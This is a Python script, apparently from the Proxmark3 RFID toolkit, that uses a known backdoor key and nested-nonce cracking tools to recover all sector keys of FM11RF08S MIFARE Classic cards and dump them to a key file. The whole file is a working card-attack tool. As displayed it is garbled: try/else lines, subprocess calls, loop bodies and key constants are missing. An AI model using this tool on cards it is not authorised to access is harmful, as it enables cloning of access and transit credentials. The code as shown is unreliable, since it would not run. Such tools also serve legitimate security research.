2024-08-16 17:46:00 +02:00

391 lines
15 KiB
Executable file

#!/usr/bin/env python3
# Combine several attacks to recover all FM11RF08S keys
# Conditions:
# * Presence of the backdoor with known key
# Duration strongly depends on some key being reused and where.
# Examples:
# * 32 random keys: ~20 min
# * 16 random keys with keyA==keyB in each sector: ~30 min
# * 24 random keys, some reused across sectors: <1 min
# Doegox, 2024, cf for more info
import os
import sys
import time
import subprocess
import argparse
import pm3
# optional color support
# pip install ansicolors
from colors import color
except ModuleNotFoundError:
def color(s, fg=None):
_ = fg
return str(s)
if os.path.basename(os.path.dirname(os.path.dirname(sys.argv[0]))) == 'client':
# dev setup
TOOLS_PATH = os.path.normpath(os.path.join(f"{os.path.dirname(sys.argv[0])}",
"..", "..", "tools", "mfc", "card_only"))
# assuming installed
TOOLS_PATH = os.path.normpath(os.path.join(f"{os.path.dirname(sys.argv[0])}",
"..", "tools"))
tools = {
"staticnested_1nt": os.path.join(f"{TOOLS_PATH}", "staticnested_1nt"),
"staticnested_2x1nt": os.path.join(f"{TOOLS_PATH}", "staticnested_2x1nt_rf08s"),
"staticnested_2x1nt1key": os.path.join(f"{TOOLS_PATH}", "staticnested_2x1nt_rf08s_1key"),
for tool, bin in tools.items():
if not os.path.isfile(bin):
if os.path.isfile(bin + ".exe"):
tools[tool] = bin + ".exe"
print(f"Cannot find {bin}, abort!")
parser = argparse.ArgumentParser(description='A script combining staticnested* tools '
'to recover all keys from a FM11RF08S card.')
parser.add_argument('-x', '--no-init-check', action='store_true', help='Do not run an initial fchk for default keys')
parser.add_argument('-y', '--no-final-check', action='store_true', help='Do not run a final fchk with the found keys')
parser.add_argument('-d', '--debug', action='store_true', help='Enable debug mode')
args = parser.parse_args()
start_time = time.time()
p = pm3.pm3()
restore_color = False
p.console("prefs get color")
p.console("prefs set color --off")
for line in p.grabbed_output.split('\n'):
if "ansi" in line:
restore_color = True
p.console("hf 14a read")
uid = None
for line in p.grabbed_output.split('\n'):
if "UID:" in line:
uid = int(line[10:].replace(' ', ''), 16)
if uid is None:
print("Card not found")
if restore_color:
p.console("prefs set color --ansi")
_ = p.grabbed_output
print("UID: " + color(f"{uid:08X}", fg="green"))
def print_key(sec, key_type, key):
kt = ['A', 'B'][key_type]
print(f"Sector {sec:2} key{kt} = " + color(key, fg="green"))
found_keys = [["", ""] for _ in range(NUM_SECTORS)]
if not args.no_init_check:
print("Checking default keys...")
p.console("hf mf fchk")
for line in p.grabbed_output.split('\n'):
if "[+] 0" in line:
res = [x.strip() for x in line.split('|')]
sec = int(res[0][4:])
if res[3] == '1':
found_keys[sec][0] = res[2]
print_key(sec, 0, found_keys[sec][0])
if res[5] == '1':
found_keys[sec][1] = res[4]
print_key(sec, 1, found_keys[sec][1])
nt = [["", ""] for _ in range(NUM_SECTORS)]
nt_enc = [["", ""] for _ in range(NUM_SECTORS)]
par_err = [["", ""] for _ in range(NUM_SECTORS)]
print("Getting nonces...")
for sec in range(NUM_SECTORS):
blk = sec * 4
if found_keys[sec][0] == "" or found_keys[sec][1] == "":
# Even if one key already found, we'll need both nt
for key_type in [0, 1]:
cmd = f"hf mf isen -n1 --blk {blk} -c {key_type+4} --key {BACKDOOR_RF08S}"
cmd += f" --c2 {key_type}"
print("Processing traces...")
for line in p.grabbed_output.split('\n'):
if "nested cmd: 64" in line or "nested cmd: 65" in line:
sec = int(line[24:26], 16)//4
key_type = int(line[21:23], 16) - 0x64
data = line[65:73]
nt[sec][key_type] = data
if "nested cmd: 60" in line or "nested cmd: 61" in line:
sec = int(line[24:26], 16)//4
key_type = int(line[21:23], 16) - 0x60
data = line[108:116]
nt_enc[sec][key_type] = data
data = line[128:136]
par_err[sec][key_type] = data
for sec in range(NUM_SECTORS):
if found_keys[sec][0] == "" or found_keys[sec][1] == "":
for key_type in [0, 1]:
if (nt[sec][key_type] == "" or
nt_enc[sec][key_type] == "" or
par_err[sec][key_type] == ""):
print("Error, could not collect nonces, abort")
if restore_color:
p.console("prefs set color --ansi")
_ = p.grabbed_output
print("Running staticnested_1nt & 2x1nt when doable...")
keys = [[set(), set()] for _ in range(NUM_SECTORS)]
all_keys = set()
duplicates = set()
# Availability of filtered dicts
filtered_dicts = [[False, False] for _ in range(NUM_SECTORS)]
for sec in range(NUM_SECTORS):
if found_keys[sec][0] != "" and found_keys[sec][1] != "":
if found_keys[sec][0] == "" and found_keys[sec][1] == "" and nt[sec][0] != nt[sec][1]:
for key_type in [0, 1]:
cmd = [tools["staticnested_1nt"], f"{uid:08X}", f"{sec}",
nt[sec][key_type], nt_enc[sec][key_type], par_err[sec][key_type]]
if args.debug:
print(' '.join(cmd)), capture_output=True)
cmd = [tools["staticnested_2x1nt"],
f"keys_{uid:08x}_{sec:02}_{nt[sec][0]}.dic", f"keys_{uid:08x}_{sec:02}_{nt[sec][1]}.dic"]
if args.debug:
print(' '.join(cmd)), capture_output=True)
filtered_dicts[sec][key_type] = True
for key_type in [0, 1]:
with (open(f"keys_{uid:08x}_{sec:02}_{nt[sec][key_type]}_filtered.dic")) as f:
keys_set = set()
while line := f.readline().rstrip():
if line not in keys_set:
keys[sec][key_type] = keys_set
else: # one key not found or both identical
if found_keys[sec][0] == "":
key_type = 0
key_type = 1
cmd = [tools["staticnested_1nt"], f"{uid:08X}", f"{sec}",
nt[sec][key_type], nt_enc[sec][key_type], par_err[sec][key_type]]
if args.debug:
print(' '.join(cmd)), capture_output=True)
with (open(f"keys_{uid:08x}_{sec:02}_{nt[sec][key_type]}.dic")) as f:
keys_set = set()
while line := f.readline().rstrip():
if line not in keys_set:
keys[sec][key_type] = keys_set
print("Looking for common keys across sectors...")
keys_filtered = [[set(), set()] for _ in range(NUM_SECTORS)]
for dup in duplicates:
for sec in range(NUM_SECTORS):
for key_type in [0, 1]:
if dup in keys[sec][key_type]:
if nt[sec][0] == nt[sec][1] and key_type == 0 and keys[sec][1] == set() and found_keys[sec][1] == "":
# Availability of duplicates dicts
duplicates_dicts = [[False, False] for _ in range(NUM_SECTORS)]
first = True
for sec in range(NUM_SECTORS):
for key_type in [0, 1]:
if len(keys_filtered[sec][key_type]) > 0:
if first:
print("Saving duplicates dicts...")
first = False
with (open(f"keys_{uid:08x}_{sec:02}_{nt[sec][key_type]}_duplicates.dic", "w")) as f:
for k in keys_filtered[sec][key_type]:
duplicates_dicts[sec][key_type] = True
abort = False
print("Brute-forcing keys... Press any key to interrupt")
for sec in range(NUM_SECTORS):
for key_type in [0, 1]:
# If we have a duplicates dict
# note: we skip if we already know one key
# as using 2x1nt1key later will be faster
if found_keys[sec][0] == "" and found_keys[sec][1] == "" and duplicates_dicts[sec][key_type]:
kt = ['a', 'b'][key_type]
dic = f"keys_{uid:08x}_{sec:02}_{nt[sec][key_type]}_duplicates.dic"
cmd = f"hf mf fchk --blk {sec * 4} -{kt} -f {dic} --no-default"
if args.debug:
for line in p.grabbed_output.split('\n'):
if "aborted via keyboard" in line:
abort = True
if "found:" in line:
found_keys[sec][key_type] = line[30:]
print_key(sec, key_type, found_keys[sec][key_type])
if nt[sec][0] == nt[sec][1] and found_keys[sec][key_type ^ 1] == "":
found_keys[sec][key_type ^ 1] = found_keys[sec][key_type]
print_key(sec, key_type ^ 1, found_keys[sec][key_type ^ 1])
if abort:
if abort:
for key_type in [0, 1]:
# If we have a filtered dict
# note: we skip if we already know one key
# as using 2x1nt1key later will be faster
if found_keys[sec][0] == "" and found_keys[sec][1] == "" and filtered_dicts[sec][key_type]:
# Use filtered dict
kt = ['a', 'b'][key_type]
dic = f"keys_{uid:08x}_{sec:02}_{nt[sec][key_type]}_filtered.dic"
cmd = f"hf mf fchk --blk {sec * 4} -{kt} -f {dic} --no-default"
if args.debug:
for line in p.grabbed_output.split('\n'):
if "aborted via keyboard" in line:
abort = True
if "found:" in line:
found_keys[sec][key_type] = line[30:]
print_key(sec, key_type, found_keys[sec][key_type])
if abort:
if abort:
# If one common key for the sector
if found_keys[sec][0] == "" and found_keys[sec][1] == "" and nt[sec][0] == nt[sec][1]:
key_type = 0
# Use regular dict
kt = ['a', 'b'][key_type]
dic = f"keys_{uid:08x}_{sec:02}_{nt[sec][key_type]}.dic"
cmd = f"hf mf fchk --blk {sec * 4} -{kt} -f {dic} --no-default"
if args.debug:
for line in p.grabbed_output.split('\n'):
if "aborted via keyboard" in line:
abort = True
if "found:" in line:
found_keys[sec][0] = line[30:]
found_keys[sec][1] = line[30:]
print_key(sec, 0, found_keys[sec][key_type])
print_key(sec, 1, found_keys[sec][key_type])
if abort:
# If one key is missing, use the other one with 2x1nt1key
if ((found_keys[sec][0] == "") ^ (found_keys[sec][1] == "")) and nt[sec][0] != nt[sec][1]:
if (found_keys[sec][0] == ""):
key_type_source = 1
key_type_target = 0
key_type_source = 0
key_type_target = 1
if duplicates_dicts[sec][key_type_target]:
dic = f"keys_{uid:08x}_{sec:02}_{nt[sec][key_type_target]}_duplicates.dic"
elif filtered_dicts[sec][key_type_target]:
dic = f"keys_{uid:08x}_{sec:02}_{nt[sec][key_type_target]}_filtered.dic"
dic = f"keys_{uid:08x}_{sec:02}_{nt[sec][key_type_target]}.dic"
cmd = [tools["staticnested_2x1nt1key"], nt[sec][key_type_source], found_keys[sec][key_type_source], dic]
if args.debug:
print(' '.join(cmd))
result =, capture_output=True, text=True).stdout
keys = set()
for line in result.split('\n'):
# print(line)
if "MATCH:" in line:
if len(keys) > 1:
kt = ['a', 'b'][key_type_target]
cmd = f"hf mf fchk --blk {sec * 4} -{kt} --no-default"
for k in keys:
cmd += f" -k {k}"
if args.debug:
for line in p.grabbed_output.split('\n'):
if "aborted via keyboard" in line:
abort = True
if "found:" in line:
found_keys[sec][key_type_target] = line[30:]
elif len(keys) == 1:
found_keys[sec][key_type_target] = keys.pop()
if found_keys[sec][key_type_target] != "":
print_key(sec, key_type_target, found_keys[sec][key_type_target])
if abort:
if restore_color:
p.console("prefs set color --ansi")
_ = p.grabbed_output
if abort:
print("Brute-forcing phase aborted via keyboard!")
args.no_final_check = True
if args.no_final_check:
plus = "[" + color("+", fg="green") + "] "
print(plus + color("found keys:", fg="green"))
print(plus + "-----+-----+--------------+---+--------------+----")
print(plus + " Sec | Blk | key A |res| key B |res")
print(plus + "-----+-----+--------------+---+--------------+----")
for sec in range(NUM_SECTORS):
keys = [["", 0], ["", 0]]
for key_type in [0, 1]:
if found_keys[sec][key_type] == "":
keys[key_type] = [color("------------", fg="red"), color("0", fg="red")]
keys[key_type] = [color(found_keys[sec][0], fg="green"), color("1", fg="green")]
print(plus + f" {sec:03} | {sec*4+3:03} | {keys[0][0]} | {keys[0][1]} | {keys[1][0]} | {keys[1][1]} ")
print(plus + "-----+-----+--------------+---+--------------+----")
print(plus + "( " + color("0", fg="red") + ":Failed / " +
color("1", fg="green") + ":Success )")
print(plus + "Generating binary key file")
keyfile = f"hf-mf-{uid:08X}-key.bin"
unknown = False
with (open(keyfile, "wb")) as f:
for key_type in [0, 1]:
for sec in range(NUM_SECTORS):
k = found_keys[sec][key_type]
if k == "":
unknown = True
print(plus + "Found keys have been dumped to `" + color(keyfile, fg="yellow")+"`")
if unknown:
print("[" + color("=", fg="yellow") + "] --[ " + color("FFFFFFFFFFFF", fg="yellow") +
" ]-- has been inserted for unknown keys")
print("Letting fchk do a final dump, just for confirmation and display...")
keys_set = set([i for sl in found_keys for i in sl if i != ""])
with (open(f"keys_{uid:08x}.dic", "w")) as f:
for k in keys_set:
cmd = f"hf mf fchk -f keys_{uid:08x}.dic --no-default --dump"
if args.debug:
p.console(cmd, passthru = True)
elapsed_time = time.time() - start_time
minutes = int(elapsed_time // 60)
seconds = int(elapsed_time % 60)
print("--- " + color(minutes, fg="yellow") + " minutes " +
color(seconds, fg="yellow") + " seconds ---")